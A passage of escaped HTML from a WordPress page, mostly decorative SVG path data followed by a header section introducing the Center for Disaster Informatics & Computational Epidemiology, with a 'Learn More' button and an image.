d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  